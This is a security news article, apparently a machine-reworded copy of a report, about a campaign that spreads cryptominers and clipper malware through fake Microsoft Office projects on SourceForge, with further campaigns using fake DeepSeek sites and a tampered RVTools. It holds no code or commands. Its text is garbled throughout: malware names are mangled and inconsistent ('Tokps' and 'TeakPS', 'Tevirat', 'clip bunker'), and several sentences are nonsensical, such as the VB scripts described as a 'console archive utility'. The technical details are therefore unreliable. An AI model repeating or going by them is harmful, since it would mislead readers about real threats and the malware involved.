Threat actors have been observed that threaten malicious payloads such as Cryptocurrency Miner and Clipper Malware through the popular software hosting service SourceForge, pose as cracked versions of legal applications like Microsoft Office.
“One such project, OfficePackage, looks so harmless that its main website sourceforge.net includes a Microsoft Office add-in copied from a legitimate Github project,” Kaspersky said in a report published today. “The OfficePackage description and content listed below have also been obtained from Github.”
All projects created on sourceforge.net will be assigned the “.sourceforge.io” domain name, but the Russian cybersecurity company has discovered the domain “officepackage.sourceforge” for officepackage.[.]IO, “View a long list of Microsoft Office applications and corresponding links and download in Russian.
Plus, when you hover the download button, you’ll see a seemingly legal URL in the browser status bar: “Loading.SourceForge[.]IO/Download. Gives the impression that the download link is associated with SourceForge. However, when you click on the link, the user will be redirected to a completely different page hosted on “TapLink”[.]CC “This will show another download button prominently.
When the victim clicks on the download button, they will be provided with a 7 MB ZIP archive (“vinstaller.zip”). This includes a text file that contains a second password-protected archive (“installer.zip”) and a password when opened.
The MSI installers residing in the new ZIP file are multiple files, console archive utility called “Unrar.exe”, RAR archive, and console archive utility called Visual Basic (VB) scripts.
“The VB script runs the PowerShell interpreter to download and run the batch file confvk from GitHub,” says Kaspersky. “This file contains the password for the RAR archive. It also unpacks the malicious file and runs the next stage script.”
The batch file is designed to run two PowerShell scripts, one of which uses the Telegram API to send system metadata. The other file downloads another batch script that affects the contents of the RAR archive, and eventually launches the payloads of the miner and clipper malware (aka clip bunker).
It will also be deleted as well as the NetCat executable (“ShellexPerienceHost.exe”) which establishes an encrypted connection with the remote server. That’s not all. The confvk batch file is known to create another file named “errorhandler.cmd” containing a PowerShell script programmed to retrieve and execute text strings via the Telegram API.
The fact that the website has a Russian interface indicates that it focuses on Russian-speaking users. Telemetry data shows that 90% of potential casualties are in Russia, with 4,604 users encountering the scheme between early January and late March.
With SourceForge[.]The IO pages indexed by search engines and displayed in search results are considered to be targeted by Russian users searching for Microsoft Office in Yandex.
“When users ask for a way to download applications from official sources, attackers will provide their own,” says Kaspersky. “Attacks are primarily targeted at cryptocurrencies by deploying miners and clip bankers, but attackers can sell system access to more dangerous parties.”
This disclosure comes when it reveals details about a campaign that distributes malware downloaders called Tokps through rogue sites that impersonate DeepSeek Artificial Intelligence (AI) chatbots and impersonate remote desktop and 3D modeling software.
This includes websites such as deepseek-ai-soft[.]com, unsuspecting users will be redirected to each malware byte via sponsored Google search results.
TeakPS is designed to download and run PowerShell scripts that allow remote access to infected hosts via SSH, dropping a modified version of Trojan called Tevirat. This highlights the threat actor’s attempts to fully access the victim’s computer in a variety of ways.
“sample […] Kaspersky uses DLL sideloads to change and deploy TeamViewer remote access software to infected devices. “Simply put, attackers place malicious libraries in the same folder as TeamViewer.
The development follows the discovery of malicious Google Ads from popular VMware utility RVTools, and provides a tampered version of Thundershell (aka Smokedham), a PowerShell-based remote access tool (RAT).
“Thundershell, sometimes called Smokedham, is a publicly exposed post-exposure framework designed for red teams and penetration testing,” Field Effect said. “This provides a command-and-control (C2) environment, allowing operators to execute commands on compromised machines through PowerShell-based agents.”
Source link
